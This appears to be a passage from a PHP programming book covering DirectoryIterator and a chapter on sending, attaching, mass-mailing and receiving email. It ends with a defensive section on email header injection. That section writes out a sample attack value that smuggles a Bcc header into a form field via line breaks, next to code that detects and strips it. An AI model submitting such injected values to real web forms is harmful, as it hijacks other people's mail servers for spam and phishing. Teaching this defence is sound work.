      The DirectoryIterator class is part of the SPL and is a convenient way to read
      file directories and retrieve file information. You can also write to the files.

      Additionally, the DirectoryIterator class has an openFile method that creates a
      SplFileObject instance for your manipulatory pleasure! Working with the
      SplFileObject is outside what we plan to cover in this solution, though, so be sure
      to check out the SPL documentation to learn more.18
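
Without attempting a full tour of SplFileObject, a minimal sketch of the openFile method may still be useful. It appends one line to a file found by DirectoryIterator. The scratch directory and the contents of example.ini are assumptions made up for this illustration:

```php
<?php
// Assumption: a throwaway directory and file created only for this sketch
$dir = sys_get_temp_dir() . '/spl_demo_' . uniqid();
mkdir($dir);
file_put_contents($dir . '/example.ini', "name = demo\n");

foreach (new DirectoryIterator($dir) as $item)
{
  if ($item->isFile() && $item->getFilename() == 'example.ini')
  {
    // openFile returns an SplFileObject; 'a' opens the file for appending
    $file = $item->openFile('a');
    $file->fwrite("mode = test\n");
    $file->fflush();
    $file = null; // drop the reference so the file handle is closed
  }
}

// Read the result back, then clean up the scratch files
$contents = file_get_contents($dir . '/example.ini');
unlink($dir . '/example.ini');
rmdir($dir);
echo $contents;
```

The mode string passed to openFile follows the same conventions as fopen, so 'r' would open the file for reading instead.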

Solution
In this example, we use the DirectoryIterator class to iterate over a file directory
and discover everything there is to know about the example.ini file:

                                                             dirIterator.php (excerpt)

 <?php
 try
 {
   // handle the various files in the directory like an array
   foreach ( new DirectoryIterator('./') as $Item )
   {
     echo $Item."\n";
     // tell me about this one file
     if($Item->getFilename() == 'example.ini')
     {
       echo "\tProperties of example.ini\n";
       echo "\tFile name = "   . $Item->getFilename() . "\n";
       echo "\tPath = "      . $Item->getPath()     . "\n";
       echo "\tPath name = "   . $Item->getPathname() . "\n";
       echo "\tPermission = " . $Item->getPerms()     . "\n";
       echo "\tInode = "     . $Item->getInode()    . "\n";
       echo "\tSize = "      . $Item->getSize()     . "\n";
       echo "\tOwner = "     . $Item->getOwner()    . "\n";
       echo "\tGroup = "     . $Item->getGroup()    . "\n";
       echo "\tAtime = "     . $Item->getATime()    . "\n";
       echo "\tMtime = "     . $Item->getMTime()    . "\n";
       echo "\tCTime = "     . $Item->getCTime()    . "\n";
       echo "\tType = "      . $Item->getType()     . "\n";
       echo "\tWritable = "    . $Item->isWritable()    . "\n";
       echo "\tReadable = "    . $Item->isReadable()    . "\n";
       echo "\tExecutable = " . $Item->isExecutable() . "\n";
       echo "\tIs file = "     . $Item->isFile()      . "\n";
       echo "\tIs directory = " . $Item->isDir()      . "\n";
       echo "\tIs link = "     . $Item->isLink()      . "\n";
       echo "\tIs dot = "    . $Item->isDot()    . "\n";
       echo "\tTo string = "   . $Item->__toString()    . "\n";
       echo '------------------------------------------------'."\n";



18
     http://www.php.net/~helly/php/ext/spl/


             echo "\tFile contents = \n";
             readfile($Item->getPathname());
             echo '------------------------------------------------'."\n";
           }
         }
         echo "\n\nAll the class methods\n";
         // give me all the methods available to the Directory Iterator
         foreach( get_class_methods('DirectoryIterator') as $methodName)
         {
           echo $methodName."\n";
         }
       }
       catch(Exception $e){
         // handle my exception
         echo 'No files Found! Message returned: '.$e->getMessage()."\n";
       }
       ?>




      Discussion
      We started the code with a simple try {…} catch {…} block to handle any
      exceptions that might occur while we’re working on the directory.19

      Next, we meet the DirectoryIterator constructor in a foreach loop. The
      DirectoryIterator is an implementation of the Iterator design pattern.20 For a
      class to implement the Iterator design pattern, it must provide a way to access the
      elements of the instantiated object in a sequential way. The DirectoryIterator
      object can be handled like an array and like an object. So we can put it in the foreach
      loop to iterate over the various files in the path provided to the constructor, which
      is similar to what we did earlier in the section called “How do I examine directories
      with PHP?”
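
To make the idea of sequential access concrete, here is a minimal sketch of a class that implements PHP's built-in Iterator interface, so that it can be used in a foreach loop just as DirectoryIterator is. The FileList class and its contents are hypothetical, and the return type declarations assume PHP 8 (drop them on PHP 5):

```php
<?php
// A hypothetical collection class, named only for this illustration
class FileList implements Iterator
{
  private $names;
  private $position = 0;

  public function __construct(array $names)
  {
    $this->names = array_values($names);
  }

  // foreach calls rewind once, then valid/current/key/next on each pass
  public function rewind(): void { $this->position = 0; }
  public function valid(): bool { return isset($this->names[$this->position]); }
  public function current(): mixed { return $this->names[$this->position]; }
  public function key(): mixed { return $this->position; }
  public function next(): void { $this->position++; }
}

$seen = array();
foreach (new FileList(array('example.ini', 'index.php')) as $index => $name)
{
  $seen[] = $index . ': ' . $name;
}
echo implode("\n", $seen), "\n";
```

The five methods are all that foreach needs; the loop never touches the private array directly.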

      We then chose a file (example.ini) and looked at all its properties using the file object’s
      methods—and obtained much the same information we obtained earlier in “How
      do I examine directories with PHP?” but without all the if statements!


      19
           Exceptions are generally considered to be the better, object oriented way of handling errors, and are
      seen as preferable to the if block statements we saw earlier.
      20
        If you don’t know what a design pattern is yet, don’t worry! Plenty of information is available on the
      Web, for example, at Wikipedia: http://en.wikipedia.org/wiki/Iterator_pattern. The PHP Manual also
      has an entry on iteration at http://www.php.net/manual/en/language.oop5.iterations.php.

Last of all, we wanted to access a full listing of the DirectoryIterator object’s
methods. We used the get_class_methods function in another foreach loop to
echo those methods out for us.

If you want more information on DirectoryIterator, first look at the SPL
documentation and all the method pages,21 paying particular attention to the user
comments. You can also review the SPL documentation with UML (Unified Modeling
Language) diagrams,22 which will give you the opportunity to see what else is
available in the SPL.


Summary
As you can see, working with files isn’t that hard! Actually, it’s fairly easy once you
know what to use and how to use it. Plenty of file-related tools are available in the
form of PHP’s built-in file system and streams functionality, numerous PEAR
packages, and the PHP 5 Standard PHP Library (SPL). Each offers something to
make your life easier—just don’t let your boss know how easy it really is!




21
     http://www.php.net/spl/
22
     http://www.php.net/~helly/php/ext/spl/
Chapter 7

Email
Building online applications isn’t just about delivering pages to web browsers—such
applications often involve email functionality as well. Email is used for a variety
of tasks within a web application, including the mailing of regular newsletters as a
means to stay in touch with visitors, and the provision of automated notifications
for user registration systems.

Once you know how to create email efficiently in PHP, it’s much easier to add email
functionality to your web site, and to communicate with your site’s visitors.


How do I send a simple email?
So you need to send a simple text email. It’s nothing fancy—just a brief text message
to pass on some information. Let’s see how it’s done.

Solutions
Two simple approaches are available. The first uses PHP’s built-in mail function,
while the second relies on the PEAR::Mail package.

      Using the PHP mail Function
      Sending simple emails is easy with PHP’s mail function.1 You need only one line
      of code to send a message—what could be easier? Here’s how it works:

                                                                            phpMail.php

          <?php
          mail('you@yourdomain.com', 'Howdy', 'Glad to meet you.',
              'From: me@mydomain.com');
          ?>



      The arguments supplied to the mail function above contain the following
      information, in the order supplied here:

      ■ the address to which we’re sending the email
      ■ the subject of the email
      ■ the body of the email

      The last argument represents any extra header information you’d like to include in
      the email. In the example above, we’ve added a From header to set the address
      from which the message is sent.
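
When more than one extra header is needed, each header goes on its own line, separated by a carriage return and line feed. The following is only a sketch: buildExtraHeaders is a hypothetical helper, the Reply-To address is made up, and the values are assumed to be trusted (never raw user input):

```php
<?php
// Hypothetical helper: joins header name/value pairs into the string
// expected by the fourth argument of mail()
function buildExtraHeaders(array $headers)
{
  $lines = array();
  foreach ($headers as $name => $value)
  {
    $lines[] = $name . ': ' . $value;
  }
  // Each header sits on its own line, separated by CRLF
  return implode("\r\n", $lines);
}

$extra = buildExtraHeaders(array(
    'From'     => 'me@mydomain.com',
    'Reply-To' => 'support@mydomain.com', // assumed address, for illustration
    'X-Mailer' => 'PHP/' . phpversion()
));

// The result can then be passed to mail, for example:
// mail('you@yourdomain.com', 'Howdy', 'Glad to meet you.', $extra);
echo $extra, "\n";
```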

      Using the PEAR::Mail Package
      In this example, we’re sending the same email using the PEAR::Mail package:

                                                                   pearMail.php (excerpt)

          <?php
          error_reporting(E_ALL);
          require 'Mail.php';
          $mail = Mail::factory('mail');
          $headers = array(
              'From'    => 'me@mydomain.com',
              'Subject' => 'Howdy'
          );
          $succ = $mail->send('you@yourdomain.com', $headers,
              'Glad to meet you.');
          if (PEAR::isError($succ))



      1
          http://www.php.net/manual/en/function.mail.php


 {
   echo 'Email sending failed: ' . $succ->getMessage();
 }
 else
 {
   echo 'Email sent successfully';
 }
 ?>




Let’s ignore the first line for a minute, and look instead at the second line, where
we include the PEAR::Mail package. Next, we use the static Mail::factory method
to instantiate a Mail object that can send email for us. We supply the argument
'mail' to the factory method to indicate that we wish to use PHP’s built-in mail
function. We then create an array for the header values we wish to include in our
email, and finally call the Mail->send method, supplying the recipient’s email
address, our array of headers, and the body text of the email.

The Mail->send method will return true if successful, and a PEAR_Error object if
it’s unsuccessful. We can test for the presence of an error using the PEAR::isError
method and act accordingly.


       Watch Out for E_STRICT Errors
      The PEAR::Mail package was originally developed with PHP 4. If you use it in
      PHP 5 with E_STRICT errors turned on, you’ll receive E_STRICT errors. In our
      example above, and in others further on, we use the error_reporting function
      to set the level of reported errors to E_ALL, which prevents E_STRICT errors from
      appearing in PHP 5 (before PHP 5.4, E_ALL does not include E_STRICT).


Discussion
The mail function can integrate with the local sendmail client (an email application
widely used on Unix-based systems), or with a remote SMTP (Simple Mail Transfer
Protocol) server if you lack a sendmail-compatible client. Your web host should be
able to supply the relevant SMTP server details for use in your script. However, if
you’re using Windows for your development environment, you’ll need to tell PHP
which SMTP server it should use to send mail by modifying the following settings
in php.ini:


          [mail function]
          ; For Win32 only.
          SMTP = smtp.yourdomain.com
          smtp_port = 25
          sendmail_from = you@yourdomain.com



      Here, we’ve set the SMTP setting to the domain name of the SMTP server, which, in
      the vast majority of cases, will be the SMTP server provided by your ISP. We’ve
      also set the smtp_port setting to the appropriate server port number (the default is
      25). The sendmail_from setting represents the sending address for your emails.
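
If you can’t edit php.ini, the same three settings can usually be changed at runtime with ini_set instead. This is a sketch only: it assumes your host permits runtime changes, and the values simply mirror the php.ini excerpt above:

```php
<?php
// Assumption: these values mirror the php.ini example; substitute your own
ini_set('SMTP', 'smtp.yourdomain.com');
ini_set('smtp_port', '25');
ini_set('sendmail_from', 'you@yourdomain.com');

// Read the settings back to confirm what mail() will use
$settings = array(
    'SMTP'          => ini_get('SMTP'),
    'smtp_port'     => ini_get('smtp_port'),
    'sendmail_from' => ini_get('sendmail_from')
);
print_r($settings);
```

Changes made with ini_set last only for the duration of the script, so they need to run before the call to mail.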

      Most of the emails you’ll want to send are probably not as simple as those we’ve
      been dealing with here. Even if you wanted to keep your emails simple and use
      only plain text, things could start to get a little complex as you started adding extra
      headers, composing longer messages, and including attachments.

      The second solution presented here uses more code than the first, which used only
      one line of PHP, but in exchange for the extra code we get a lot more flexibility, and
      we’ll find the system easier to use when we create more complex emails. For that
      reason, the remaining examples will use the various classes available from the PEAR
      package.


      How do I simplify the generation
      of complex emails?
      Using the mail function is fine for simple messages, but its limitations become
      apparent when you attempt to create more complex emails. For instance, you might
      decide you want to have your own email address appearing in the From field of a
      message, to add people’s names alongside their addresses, to carbon copy (CC) email
      to a number of recipients, or to send your emails to a different SMTP server. In any
      of these cases, you’ll need something more than mail to get the job done.

      Enter: the PEAR::Mail and PEAR::Mail_Mime classes.2 These classes give the mail
      function a raft of extra functionality, such as the ability to include attachments,
      create HTML and mixed-format emails, bypass the mail function completely, and


      2
        See the Mail package documentation at http://pear.php.net/manual/en/package.mail.mail.php, and
      the Mail_Mime documentation at http://pear.php.net/manual/en/package.mail.mail-mime.php.

connect to an SMTP server directly. These classes also provide an API that makes
the construction of more complex emails very easy.

Solution
This code uses a specified SMTP server to send email:

                                                                     pearMailSMTP.php (excerpt)

    <?php
    error_reporting(E_ALL);
    require 'Mail.php';
    $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.com'));
    $hdrs = array(
        'From'    => 'Me <me@mydomain.com>',
        'CC'    => 'Mr Example <example@exampledomain.com>',
        'Subject' => 'Howdy'
    );
    $body = 'Glad to meet you.';
    $succ = $mail->send('you@yourdomain.com', $hdrs, $body);
    if (PEAR::isError($succ))
    {
      echo 'Email sending failed: ' . $succ->getMessage();
    }
    else
    {
      echo 'Email sent successfully';
    }
    ?>



Discussion
Thanks to the PEAR::Mail class, we’re no longer limited to using PHP’s mail
configuration, so we can set up mail as we choose. The Mail::factory method accepts
parameters for the type of mail system you want to use, and for any options you
want to specify for your back-end setup.3 Mail::factory accepts one of the
following:




3
 See http://pear.php.net/manual/en/package.mail.mail.factory.php for more information on the options
available for back-end mail systems.

      mail        uses the configured PHP mail settings

      sendmail    allows you to control which sendmail program is used, and which
                  options are sent to it

      smtp        contacts an SMTP server to send the mail for you
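
As a rough sketch of how the second argument to Mail::factory varies by back end, the array below pairs each back end with some typical parameters. The path, host, and port values are assumptions for illustration; see the factory documentation for the full list of options each back end accepts:

```php
<?php
// Parameters for each back end; the path, host, and port values are assumptions
$backends = array(
    'mail'     => array(),
    'sendmail' => array(
        'sendmail_path' => '/usr/sbin/sendmail',
        'sendmail_args' => '-i'
    ),
    'smtp'     => array(
        'host' => 'smtp.mydomain.com',
        'port' => 25,
        'auth' => false
    )
);

$driver = 'sendmail';

// Only call the factory if PEAR::Mail can be found on the include path
if (stream_resolve_include_path('Mail.php') !== false)
{
  require_once 'Mail.php';
  $mail = Mail::factory($driver, $backends[$driver]);
}
```

Keeping the parameters in one array like this makes it easy to switch back ends between a development machine and a production server.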

      When we work with multipart emails (for example, emails that include text and
      HTML parts) we’ll use the PEAR::Mail_Mime class as well. It doesn’t replace the
      PEAR::Mail class; rather, it builds the message body and headers that a Mail
      object then sends, and its API provides a number of additional features to make
      our lives much easier.


      How do I add attachments to messages?
      Sending an attachment with your email is incredibly easy with the PEAR::Mail_Mime
      class.

      Solution
      Take a look at this code, which shows the Mail_Mime->addAttachment method in
      action:

                                                                attachment.php (excerpt)

       <?php
       error_reporting(E_ALL);
       require 'Mail.php';
       require 'Mail/mime.php';
       $mime = new Mail_Mime("\r\n");
       $mime->setTXTBody('See attached text file.');
       $mime->addAttachment(
           'test.txt',
           'text/plain',
           'attached.txt',
           TRUE,
           'quoted-printable'
       );
       $body = $mime->get();
       $hdrs = $mime->headers(array(
           'From'    => 'me@mydomain.com',
           'Subject' => 'File Attachment'
       ));
       $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.com'));


    $succ = $mail->send('you@yourdomain.com', $hdrs, $body);
    if (PEAR::isError($succ))
    {
      echo 'Email sending failed: ' . $succ->getMessage();
    }
    else
    {
      echo 'Email sent successfully';
    }
    ?>




First, we instantiate a Mail_Mime object, passing the line endings we wish to use
for the email. The text for the body of the email is then set using the Mail_Mime
object’s setTXTBody method, and we add the attachment using the addAttachment
method. Next, we call the get method to build the email’s body, and the headers
method to create any special headers we might need. The get method should always
be called before the headers method.

Then, just like the previous examples, we use the Mail::factory method to
instantiate our Mail object, and we call the send method to send our email, supplying it
with the body and header parts we built using the Mail_Mime class. This solution’s
simple and powerful—just how we like it!

Discussion
You can transfer more than just text files with the addAttachment method.4 Feel
free to use it for images or application files. Just be sure to specify the correct content
type for the file in the second argument. If you don’t supply any more arguments
to the method, the defaults will be used, and usually, they’re fine. Here’s an
example:

    $mime->addAttachment('php.gif', 'image/gif');



If the defaults aren’t suitable, you can specify precisely how you want the file to be
attached to the email. The third argument represents the filename you want the
attachment to display on the email.


4
    To view the full documentation for the addAttachment method, see
http://pear.php.net/manual/en/package.mail.mail-mime.addattachment.php.

      Don’t feel like using a text file? Perhaps you’d rather use a variable containing the
      text that you want to attach? No problem. Place that variable in the first argument,
      and set the fourth to false, like so:

       $txt = 'testing testing - 1, 2, 3';
       $mime->addAttachment(
           $txt,
           'text/plain',
           'TestMe.txt',
           false,
           'quoted-printable'
       );



      The fifth argument represents the transfer encoding. While the default encoding,
      'base64', is fine for most files, for text-based files, you may wish to use
      'quoted-printable' instead.
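
To see why quoted-printable suits text, it can help to compare the two encodings side by side. This sketch uses PHP’s built-in base64_encode and quoted_printable_encode functions (the latter requires PHP 5.3 or later) rather than Mail_Mime itself, and the sample text is made up:

```php
<?php
// Sample text containing an equals sign and a UTF-8 accented character
$text = "Price = 5, Caf\xC3\xA9 menu";

$base64 = base64_encode($text);
$quoted = quoted_printable_encode($text);

echo "base64:           $base64\n";
echo "quoted-printable: $quoted\n";

// Both encodings are reversible
$roundTrip = quoted_printable_decode($quoted) === $text
    && base64_decode($base64) === $text;
```

The quoted-printable version leaves ordinary letters readable and escapes only the characters that need it, whereas base64 transforms every byte.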


             Did You See “Notice” Error Messages?
            At the time of writing, a number of Notice log messages will be thrown from the
            PEAR::Mail_Mime class if you use PHP 5.1.6 for this solution. These notices are
            the result of a change to the PHP internals, for which a bug report has been
            submitted to the PHP development team, but which doesn’t affect the output of the
            script.

            If the Notice messages bother you, turn them off with the error_reporting
            function, but remember that by doing this, you could also very easily hide a
            problem with your script.



      How do I send HTML email?
      Most email clients are capable of understanding HTML that’s placed in the body of
      an email. Using PEAR::Mail_Mime, it’s easy to add HTML to emails, and even to
      embed images within the document. This class will automatically determine
      whether or not you’ve placed HTML in the body of the message and set the MIME
      headers accordingly. You can also add an alternative text version of your email for
      use by recipients whose email clients cannot, or choose not, to display HTML emails.


Solution
The code below sends a multipart message—one part is HTML, while the other is
plain text—as well as an image that’s embedded in the HTML with an img tag:

                                                         htmlEmail.php (excerpt)

 <?php
 error_reporting(E_ALL);
 include('Mail.php');
 include('Mail/mime.php');
 $text = "Text version of email\nMessage made with PHP";
 $html = '<html><body>HTML version of email<br />';
 $html .= 'Message made with <img src="12345" /></body></html>';
 $crlf = "\n";
 $hdrs = array(
     'From'    => 'me@mydomain.com',
     'Subject' => 'Test HTML Email with Embedded Image'
 );
 $mime = new Mail_mime($crlf);
 $mime->setTXTBody($text);
 $mime->addHTMLImage('php.gif', 'image/gif', '12345', true);
 $mime->setHTMLBody($html);
 $body = $mime->get();
 $hdrs = $mime->headers($hdrs);

 $mail = Mail::factory('mail');
 $succ = $mail->send('you@yourdomain.com', $hdrs, $body);
 if (PEAR::isError($succ))
 {
   echo 'Email sending failed: ' . $succ->getMessage();
 }
 else
 {
   echo 'Email sent successfully';
 }
 ?>



The output of this code can be seen in Figure 7.1.




                                  Figure 7.1. Displaying the multipart message


      How do I mail a message to
      a group of people?
      In many cases, it’s useful to be able to mail a message to more than one person at a
      time—for example, if you’re sending a newsletter, a message to a group mailing list,
      a site update notification to the IT staff, a feature freeze notification to a development
      team, and so on. However, in certain circumstances, sending unsolicited email to
      a group of people can also be called spamming—something I’m sure you won’t be
      doing with PHP!

      If you’re using PEAR::Mail_Mime, you have the option to send group email by adding
      BCC or CC headers to the email message. This approach may not suit your
      requirements, though: listing all the addresses from an especially large distribution list
      in the header of a single email can quickly overwhelm your email server.

      A better approach is to send each email individually, reusing the same instance of
      the PEAR::Mail_Mime class for each new message.


Solution
In this hypothetical example, we’ll retrieve a list of names and email addresses from
a discussion forum’s member database, and reuse one instance of the
PEAR::Mail_Mime class to send an email to each of those addresses:

                                                                  group.php (excerpt)

 <?php
 error_reporting(E_ALL);
 require 'Mail.php';
 require 'Mail/mime.php';

 /* create the email */

 $mime = new Mail_Mime("\r\n");
 $mime->addAttachment('php.gif', 'image/gif');
 $header = array(
     'From'    => 'me@mydomain.com',
     'Subject' => 'Forum Newsletter'
 );
 $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.net'));

 /* go to the database to get the member information */

 $dsn = 'mysql:host=localhost;dbname=forum;';
 $user = 'user';
 $password = 'secret';
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'SELECT member_email, firstname, lastname FROM member';

   /* cycle through the list sending the custom emails */

   foreach ($dbh->query($sql) as $row)
   {
     $mime->setTXTBody(
         "Howdy {$row['firstname']} {$row['lastname']}");
     $body = $mime->get();
     $hdrs = $mime->headers( $header);
     $succ = $mail->send($row['member_email'], $hdrs, $body);
     if (PEAR::isError($succ))


           {
             error_log("Email not sent to {$row['member_email']}: " .
                $succ->getMessage());
           }
         }
       }
       catch (PDOException $e)
       {
         echo 'PDO Exception Caught. ';
         echo 'Error with the database: <br />';
         echo 'SQL Query: ', $sql;
         echo 'Error: ' . $e->getMessage();
       }
       ?>




      In the above example, we instantiate the PEAR::Mail_Mime object and set up the
      message and its sender. We then go to our hypothetical member database and retrieve
      each member’s email address, first name, and last name. Then, using that result set,
      we add a custom welcome message to the email, build the message, set the headers,
      and send the email to that user’s email address.

      Discussion
      For very large distribution lists, a simple foreach loop won’t quite cut it—you’ll
      risk flooding your mail server with messages! Instead, you’ll need to devise a means
      of sending the messages at a rate that your server can handle. The simplest way to
      achieve this is to use the PHP sleep function to pause your script every ten messages
      or so. You’ll also need to use the set_time_limit function to allow your script to
      run for more than the default thirty-second limit.
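
The throttling idea might be sketched as follows. The sendThrottled function is a hypothetical helper, and its $send argument stands in for whatever actually sends a message (the Mail->send call in the solution above, for instance). The batch size and pause length are assumptions you would tune for your own server:

```php
<?php
// Hypothetical helper: calls $send for each recipient, pausing after every
// $batchSize messages
function sendThrottled(array $recipients, $send, $batchSize = 10, $pause = 5)
{
  set_time_limit(0); // remove the execution time limit for this script
  $sent = 0;
  foreach ($recipients as $recipient)
  {
    call_user_func($send, $recipient);
    $sent++;
    if ($sent % $batchSize == 0)
    {
      sleep($pause); // give the mail server a moment to catch up
    }
  }
  return $sent;
}

// Usage with a stand-in sender that only records each address
$log = array();
$recorder = function ($address) use (&$log) { $log[] = $address; };
$count = sendThrottled(
    array('a@example.com', 'b@example.com', 'c@example.com'),
    $recorder, 2, 0);
```

Passing the sender in as a callback keeps the pacing logic separate from the mail code, which also makes it easy to try out without sending anything.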

      Lastly, don’t forget to contact your hosting service to see if they have set any
      limitations or restrictions to which you must adhere. Some hosting services place a strict
      limit on the number of emails that can be sent per hour, in an effort to protect
      themselves from being seen as spammers.


             Complying with Anti-spam Legislation
            In the United States (at the state and federal level), laws have been passed regarding
            unsolicited emails and spam. The USA has the federal CAN-SPAM Act of 2003
            as well as numerous individual state laws, and these may affect what you include
            in, and how you send, your emails. The USA is not the only country to pass such
            laws, of course: countries in the European Union, Asia, South America, and so
            on around the globe have also put anti-spam legislation in place. For more
            information, visit the Spam Laws web site (though it is not a definitive listing),5 and see
            your local government web site.



How do I handle incoming mail with PHP?
You’ve already seen that sending mail with PHP is no problem. But what about
dealing with incoming mail using PHP? If your site is hosted on a Linux system,
you’ll be happy to hear that with a little tuning, it’s easy to have PHP examine
incoming email.

Solution
In this solution, I’ll assume that you have your site hosted on a Linux-based system,
that you have command prompt access to the server and are able to run PHP from
the command prompt, and that you’re using sendmail to handle email on the server.
Phew! It’s a long list of requirements, I know, but this fairly common configuration
greatly simplifies matters.

First things first: you need to place a file called .forward in your home directory.
Use a text editor to write the following to the file (all on one line):

    you@yoursite.com "|/home/yourUserName/mailhandler.php"



Now, within the PHP script mailhandler.php, you can process incoming email for
the you@yoursite.com email address in any way you like. Here’s an example script
that detects incoming email from a particular address and sends a second notification
email in response:

                                                                      mailhandler.php (excerpt)

    #!/usr/bin/php
    <?php
    // Read the whole email from standard input
    // (filesize cannot report the size of the php://stdin stream)
    $fp = fopen('php://stdin', 'r');
    $email = stream_get_contents($fp);


5
    http://www.spamlaws.com/


          fclose($fp);
          // Break the email up by linefeeds
          $email = explode("\n", $email);
          // Initialize vars
          $from = '';
          $numLines = count($email);
          for ($i = 0; $i < $numLines; $i++) {
            // Watch out for the From header
            if (preg_match("/^From: (.*)/", $email[$i], $matches)) {
              $from = $matches[1];
              break;
            }
          }
          // Forward the message to the hotline email
          if (strstr($from, 'vip@example.com')) {
            mail('you@yourdomain.com', 'Urgent Message!',
                 'Check your mail!');
          }
          ?>




      Discussion
      The .forward file tells the mail system on the server that any email that’s headed for
      you@yoursite.com not only needs to be delivered to that address, but must also be
      sent to the PHP script at /home/yourUserName/mailhandler.php.

      The PHP script that’s given in this solution is intended to be run automatically by
      the mail system—not by your web server. The first line of the file must point to the
      location of the standalone PHP program on your server (commonly /usr/bin/php)
      and is known as the shebang. After that, the code fetches the email from standard
      input and manipulates it.

      There are a number of ways in which you can manipulate an inbound email. First
      of all, you have the simple string functions we used above, which are built into
      PHP. The IMAP extension and the MailParse extension are also available. And in
      PEAR, you can use the Mail_Mime package (Mail_mimeDecode, to be specific) as
      well.6
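
Sticking with the simple string functions, the header search can be made a little more careful by looking only at the header section, which ends at the first blank line. The extractFrom function below is a hypothetical helper and the message is made up. Note that this sketch does not handle headers folded across several lines:

```php
<?php
// Hypothetical helper: returns the value of the first From header, or ''
function extractFrom($rawEmail)
{
  // Headers end at the first blank line; ignore anything in the body
  $parts = preg_split('/\r?\n\r?\n/', $rawEmail, 2);
  foreach (preg_split('/\r?\n/', $parts[0]) as $line)
  {
    if (preg_match('/^From:\s*(.*)$/i', $line, $matches))
    {
      return trim($matches[1]);
    }
  }
  return '';
}

// A made-up message for illustration
$raw = "To: you@yoursite.com\r\n"
     . "From: VIP <vip@example.com>\r\n"
     . "Subject: Hello\r\n"
     . "\r\n"
     . "From: not a header, just body text\r\n";

$from = extractFrom($raw);
$isVip = strpos($from, 'vip@example.com') !== false;
```

For anything beyond a quick check like this, one of the dedicated parsers mentioned above is likely to be the safer choice.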




      6
          For an example of Mail_mimeDecode in action, see
      http://pear.php.net/manual/en/package.mail.mail-mimedecode.example.php.


           A Solution Looking for a Problem?
         The value of handling incoming emails with PHP may not
         be obvious at first. But if you’ve ever read the SitePoint “TechTimes,”7 you know
         the answer, whether you realize it or not! The actions of subscribing to, and
         unsubscribing from, that mailing list are handled by PHP. You could also use PHP
         to build spam filters, to allow users to submit updates to the versioning system
         of your application via emails sent to a special address (with proper authentication
         of course), and to create a whole host of other applications.



How can I protect my site
against email injection attacks?
An email injection attack occurs when a cracker uses your web site’s email form
to send email in a way you never intended, either by spoofing your form, or using
a script to fill out the form and submit it. A few nastier examples of this sort of
behavior include sending spam through your form, mailing mass email using your
bandwidth, or sending emails that pretend to be from you in a phishing attempt.
These kinds of attacks can have consequences: they may be as simple as receiving a
warning from your hosting provider, or as problematic as paying higher costs for
bandwidth, suffering the revocation of your email privileges by the hosting company,
or being blacklisted as a known spammer.

By using PHP’s mail function to handle your site’s mail form, you open yourself to
the possibility of an email injection attack not because of a fault in the PHP mail
function, but because of the MIME and SMTP standards. Without getting into the
details of those standards, you should know that all it takes for a cracker to gain
control of your email form is for them to be able to add to or manipulate the
message’s original header. A craftily added new line character or additional header line
is all it takes.

Luckily, when you get right down to it, basic protection from an email injection
attack is incredibly simple to implement: do not allow new lines in the user input
that’s used in email headers. Despite the ease with which attacks are avoided using
this technique, many developers fail to implement it.
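
To illustrate what such an attack looks like, the sketch below shows a made-up value that a cracker might submit in a form’s “from” field, along with a hypothetical hasHeaderInjection helper that detects it. Rejecting the input outright, as shown here, is an alternative to stripping the new lines:

```php
<?php
// Hypothetical helper: true if the value contains a carriage return or line feed
function hasHeaderInjection($value)
{
  return preg_match('/[\r\n]/', $value) === 1;
}

// What a malicious "from" field might look like: a second header smuggled in
$attack = "visitor@example.com\r\nBcc: victim1@example.com, victim2@example.com";
$honest = 'visitor@example.com';

$attackBlocked = hasHeaderInjection($attack);
$honestBlocked = hasHeaderInjection($honest);
```

If the first value were placed into a From header unchecked, the text after the line break would be treated as a header of its own.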


7
    http://www.sitepoint.com/newsletter/


            Diving into the Details
           If you need more details on the SMTP and MIME protocols, search the Web for
           light-weight information, or go straight to the source by reading the relevant RFCs
           (Requests for Comments) at the Internet Engineering Task Force web site.

           For information on SMTP, see:

           ■ http://www.ietf.org/rfc/rfc0821.txt

           And for information on the MIME protocol, visit:

           ■ http://www.ietf.org/rfc/rfc2045.txt
           ■ http://www.ietf.org/rfc/rfc2046.txt
           ■ http://www.ietf.org/rfc/rfc2047.txt
           ■ http://www.ietf.org/rfc/rfc2048.txt
           ■ http://www.ietf.org/rfc/rfc2049.txt



      Solution
      Here’s an example that shows how to remove new lines from user input:

                                                                              attack.php (excerpt)

       <?php
       $error = FALSE;
       if (isset($_POST['submit']))
       {
         $to = 'me@mydomain.com';
         // replace new lines with a space
         // prevents a user from adding headers
         $subject = preg_replace('/[\r\n]+/', " ", $_POST['subject']);
         $from = preg_replace('/[\r\n]+/', " ", $_POST['from']);

         // basic validation for subject and email address
         $emailPattern = '/^[\w\-.]+@([\w-]+\.)+[\w-]{2,4}$/';
         // reject a subject containing any character outside the allowed set
         if (!preg_match('/^[\w .!?*%$#]+$/', $subject) ||
           !preg_match($emailPattern, $from))
         {
           $error = "Invalid input. Try again.";
         }

         if ($error === FALSE &&
           mail($to, $subject, $_POST['message'], "From: $from"))
         {
           $error = "Message Sent";
         }
         else
         {
           $error .= " We could not send your message. Sorry";
         }
       }
       ?>




Discussion
As I mentioned, setting up basic protection from email injection attacks is as simple
as removing any new lines from the user input, but you can gain additional protection
by validating the user input that will be used in the header of the email; that
is, by validating any text that will appear in the To, From, or Subject headers.

In the solution provided here, I used the regular expression function preg_replace to search
for new line characters (\r or \n), and replace them with a space. I also validated the
From address and the email Subject line to ensure that they contain legitimate values.
The validation aspect is more difficult to explain, since it uses Perl-compatible
regular expressions (also known as “pcre”) and is unfortunately beyond the scope
of this section of the book. Luckily, there are plenty of resources available online
to help you.8
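
As an alternative to a hand-written pattern, the following sketch rejects a header value outright when it contains a line break, and checks the address with PHP's built-in filter_var function. The helper names isSafeHeaderValue and isValidFrom are hypothetical, and this is one possible approach rather than the one used in attack.php:

```php
<?php
// Hypothetical helper: true only when the value has no CR or LF.
function isSafeHeaderValue(string $value): bool
{
    return preg_match('/[\r\n]/', $value) === 0;
}

// Hypothetical helper: a usable From address must be free of line
// breaks and must pass PHP's built-in email validation filter.
function isValidFrom(string $from): bool
{
    return isSafeHeaderValue($from)
        && filter_var($from, FILTER_VALIDATE_EMAIL) !== false;
}
```

Rejecting suspicious input, instead of quietly repairing it, means a tampered submission never reaches the mail function at all.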

Sites that provide additional information on email injection attacks include:

■ http://www.securephpwiki.com/index.php/Email_Injection
